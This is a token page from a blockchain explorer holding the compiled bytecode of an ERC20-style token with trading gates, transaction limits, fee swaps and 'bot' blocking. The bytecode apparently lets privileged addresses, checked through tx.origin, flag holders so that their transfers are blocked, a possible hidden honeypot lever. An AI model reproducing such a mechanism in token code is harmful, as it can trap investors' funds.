900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156115df573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906116039190613319565b815f8151811061161657611615613344565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050308160018151811061166557611664613344565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050601e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663b6f9de95835f8461dead426040518663ffffffff1660e01b81526004016117029493929190613461565b5f604051808303818588803b158015611719575f5ffd5b505af115801561172b573d5f5f3e3d5ffd5b50505050505050565b60225f9054906101000a900460ff1681565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036117bb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117b29061351b565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611829576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611820906135a9565b60405180910390fd5b8060195f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516119039190612df6565b60405180910390a3505050565b5f5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361197f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161197690613611565b60405180910390fd5b601a5f3273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff166119d357816119d5565b325b9050919050565b5f5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603611a4b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a429061369f565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611ab9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ab09061372d565b60405180910390fd5b60225f9054906101000a900460ff16611b6757601a5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16611b55576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b4c906137bb565b60405180910390fd5b611b608484846123db565b90506121ec565b60065f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16158015611c05575060065f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b611c44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c3b90613823565b60405180910390fd5b601a5f3273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611ce75750601f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b8015611d20575061dead73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16145b8015611d4157506103e882611d3486610d89565b611d3e919061386e565b11155b15611da457600160065f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600190506121ec565b601f60149054906101000a900460ff1615611dcb57611dc48484846123db565b90506121ec565b611dd361100b565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614158015611e415750611e1161100b565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614155b15611e5157611e5084836125a5565b5b5f611e5b30610d89565b90505f6008548210159050808015611e805750601f60149054906101000a900460ff16155b8015611ed35750601d5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611ee257611ee18261263f565b5b611f69846040518060400160405280601481526020017f496e73756666696369656e742042616c616e636500000000000000000000000081525060185f8a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546121f39092919063ffffffff16565b60185f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505f601a5f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16806120465750601a5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b61205a576120558787876127ec565b61205c565b845b9050600b5f9054906101000a900460ff1680156120c05750601b5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b156120ee57600a546120e3826120d589610d89565b61229e90919063ffffffff16565b11156120ed575f5ffd5b5b61213e8160185f8973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461229e90919063ffffffff16565b60185f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508573ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516121dc9190612df6565b60405180910390a3600193505050505b9392505050565b5f83831115829061223a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122319190612e7f565b60405180910390fd5b505f8385612248919061386e565b9050809150509392505050565b5f61229683836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506121f3565b905092915050565b5f5f82846122ac91906138a1565b9050838110156122f1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122e89061391e565b60405180910390fd5b8091505092915050565b61232730601e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff168461174d565b601e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d7198230855f5f61237161100b565b426040518863ffffffff1660e01b81526004016123939695949392919061393c565b60606040518083038185885af11580156123af573d5f5f3e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906123d491906139af565b5050505050565b5f612463826040518060400160405280601481526020017f496e73756666696369656e742042616c616e636500000000000000000000000081525060185f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546121f39092919063ffffffff16565b60185f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506124f48260185f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461229e90919063ffffffff16565b60185f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516125929190612df6565b60405180910390a3600190509392505050565b600954811115806125fc5750601c5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b61263b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161263290613a49565b60405180910390fd5b5050565b6001601f60146101000a81548160ff0219169083151502179055505f612697600261268960175461267b60155487612a0690919063ffffffff16565b612a7d90919063ffffffff16565b612a7d90919063ffffffff16565b90505f6126ad828461225590919063ffffffff16565b90506126b881612ac6565b5f4790505f6126e76126d66002601554612a7d90919063ffffffff16565b60175461225590919063ffffffff16565b90505f61272460026127168461270860155488612a0690919063ffffffff16565b612a7d90919063ffffffff16565b612a7d90919063ffffffff16565b90505f61273a828561225590919063ffffffff16565b90505f8111156127705761276f600c5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1682612d35565b5b5f8211801561277e57505f86115b156127c95761278d86836122fb565b7f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5618583886040516127c093929190613a67565b60405180910390a15b5050505050505f601f60146101000a81548160ff02191690831515021790555050565b5f5f5f9050601d5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161561286f57612868606461285a600f5486612a0690919063ffffffff16565b612a7d90919063ffffffff16565b90506128ea565b601d5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16156128e9576128e660646128d860135486612a0690919063ffffffff16565b612a7d90919063ffffffff16565b90505b5b5f8111156129e9576129428160185f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205461229e90919063ffffffff16565b60185f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516129e09190612df6565b60405180910390a35b6129fc818461225590919063ffffffff16565b9150509392505050565b5f5f8303612a16575f9050612a77565b5f8284612a239190613a9c565b9050828482612a329190613b0a565b14612a72576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612a6990613baa565b60405180910390fd5b809150505b92915050565b5f612abe83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250612d7d565b905092915050565b5f600267ffffffffffffffff811115612ae257612ae16132d8565b5b604051908082528060200260200182016040528015612b105781602001602082028036833780820191505090505b50905030815f81518110612b2757612b26613344565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050601e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612bcb573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190612bef9190613319565b81600181518110612c0357612c02613344565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050612c6930601e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff168461174d565b601e5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac947835f8430426040518663ffffffff1660e01b8152600401612ccb959493929190613bc8565b5f604051808303815f87803b158015612ce2575f5ffd5b505af1158015612cf4573d5f5f3e3d5ffd5b505050507f32cde87eb454f3a0b875ab23547023107cfad454363ec88ba5695e2c24aa52a78282604051612d29929190613c20565b60405180910390a15050565b8173ffffffffffffffffffffffffffffffffffffffff166108fc8290811502906040515f60405180830381858888f19350505050158015612d78573d5f5f3e3d5ffd5b505050565b5f5f83118290612dc3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612dba9190612e7f565b60405180910390fd5b505f8385612dd19190613b0a565b9050809150509392505050565b5f819050919050565b612df081612dde565b82525050565b5f602082019050612e095f830184612de7565b92915050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f612e5182612e0f565b612e5b8185612e19565b9350612e6b818560208601612e29565b612e7481612e37565b840191505092915050565b5f6020820190508181035f830152612e978184612e47565b905092915050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f612ecc82612ea3565b9050919050565b612edc81612ec2565b8114612ee6575f5ffd5b50565b5f81359050612ef781612ed3565b92915050565b612f0681612dde565b8114612f10575f5ffd5b50565b5f81359050612f2181612efd565b92915050565b5f5f60408385031215612f3d57612f3c612e9f565b5b5f612f4a85828601612ee9565b9250506020612f5b85828601612f13565b9150509250929050565b5f8115159050919050565b612f7981612f65565b82525050565b5f602082019050612f925f830184612f70565b92915050565b5f819050919050565b5f612fbb612fb6612fb184612ea3565b612f98565b612ea3565b9050919050565b5f612fcc82612fa1565b9050919050565b5f612fdd82612fc2565b9050919050565b612fed81612fd3565b82525050565b5f6020820190506130065f830184612fe4565b92915050565b5f61301682612ea3565b9050919050565b6130268161300c565b82525050565b5f60208201905061303f5f83018461301d565b92915050565b5f5f5f6060848603121561305c5761305b612e9f565b5b5f61306986828701612ee9565b935050602061307a86828701612ee9565b925050604061308b86828701612f13565b9150509250925092565b61309e81612ec2565b82525050565b5f6020820190506130b75f830184613095565b92915050565b5f60ff82169050919050565b6130d2816130bd565b82525050565b5f6020820190506130eb5f8301846130c9565b92915050565b5f6020828403121561310657613105612e9f565b5b5f61311384828501612ee9565b91505092915050565b5f5f6040838503121561313257613131612e9f565b5b5f61313f85828601612ee9565b925050602061315085828601612ee9565b9150509250929050565b5f6020828403121561316f5761316e612e9f565b5b5f61317c84828501612f13565b91505092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806131c957607f821691505b6020821081036131dc576131db613185565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f613216602083612e19565b9150613221826131e2565b602082019050919050565b5f6020820190508181035f8301526132438161320a565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f6132a4602683612e19565b91506132af8261324a565b604082019050919050565b5f6020820190508181035f8301526132d181613298565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b5f8151905061331381612ed3565b92915050565b5f6020828403121561332e5761332d612e9f565b5b5f61333b84828501613305565b91505092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f819050919050565b5f61339461338f61338a84613371565b612f98565b612dde565b9050919050565b6133a48161337a565b82525050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b6133dc81612ec2565b82525050565b5f6133ed83836133d3565b60208301905092915050565b5f602082019050919050565b5f61340f826133aa565b61341981856133b4565b9350613424836133c4565b805f5b8381101561345457815161343b88826133e2565b9750613446836133f9565b925050600181019050613427565b5085935050505092915050565b5f6080820190506134745f83018761339b565b81810360208301526134868186613405565b90506134956040830185613095565b6134a26060830184612de7565b95945050505050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f613505602483612e19565b9150613510826134ab565b604082019050919050565b5f6020820190508181035f830152613532816134f9565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f613593602283612e19565b915061359e82613539565b604082019050919050565b5f6020820190508181035f8301526135c081613587565b9050919050565b7f544f4b454e3a2061646472657373207a65726f000000000000000000000000005f82015250565b5f6135fb601383612e19565b9150613606826135c7565b602082019050919050565b5f6020820190508181035f830152613628816135ef565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f613689602583612e19565b91506136948261362f565b604082019050919050565b5f6020820190508181035f8301526136b68161367d565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f613717602383612e19565b9150613722826136bd565b604082019050919050565b5f6020820190508181035f8301526137448161370b565b9050919050565b7f544f4b454e3a2054686973206163636f756e742063616e6e6f742073656e64205f8201527f746f6b656e7320756e74696c2074726164696e6720697320656e61626c656400602082015250565b5f6137a5603f83612e19565b91506137b08261374b565b604082019050919050565b5f6020820190508181035f8301526137d281613799565b9050919050565b7f426f74206973206e6f7420616c6c6f77656400000000000000000000000000005f82015250565b5f61380d601283612e19565b9150613818826137d9565b602082019050919050565b5f6020820190508181035f83015261383a81613801565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61387882612dde565b915061388383612dde565b925082820390508181111561389b5761389a613841565b5b92915050565b5f6138ab82612dde565b91506138b683612dde565b92508282019050808211156138ce576138cd613841565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f7700000000005f82015250565b5f613908601b83612e19565b9150613913826138d4565b602082019050919050565b5f6020820190508181035f830152613935816138fc565b9050919050565b5f60c08201905061394f5f830189613095565b61395c6020830188612de7565b613969604083018761339b565b613976606083018661339b565b6139836080830185613095565b61399060a0830184612de7565b979650505050505050565b5f815190506139a981612efd565b92915050565b5f5f5f606084860312156139c6576139c5612e9f565b5b5f6139d38682870161399b565b93505060206139e48682870161399b565b92505060406139f58682870161399b565b9150509250925092565b7f5458204c696d69742045786365656465640000000000000000000000000000005f82015250565b5f613a33601183612e19565b9150613a3e826139ff565b602082019050919050565b5f6020820190508181035f830152613a6081613a27565b9050919050565b5f606082019050613a7a5f830186612de7565b613a876020830185612de7565b613a946040830184612de7565b949350505050565b5f613aa682612dde565b9150613ab183612dde565b9250828202613abf81612dde565b91508282048414831517613ad657613ad5613841565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f613b1482612dde565b9150613b1f83612dde565b925082613b2f57613b2e613add565b5b828204905092915050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f5f8201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b5f613b94602183612e19565b9150613b9f82613b3a565b604082019050919050565b5f6020820190508181035f830152613bc181613b88565b9050919050565b5f60a082019050613bdb5f830188612de7565b613be8602083018761339b565b8181036040830152613bfa8186613405565b9050613c096060830185613095565b613c166080830184612de7565b9695505050505050565b5f604082019050613c335f830185612de7565b8181036020830152613c458184613405565b9050939250505056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212201faebb54d852790be294c50a6eb6ec8d5fad702cb5cea44059e7485c247d9f7f64736f6c634300081c0033

Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.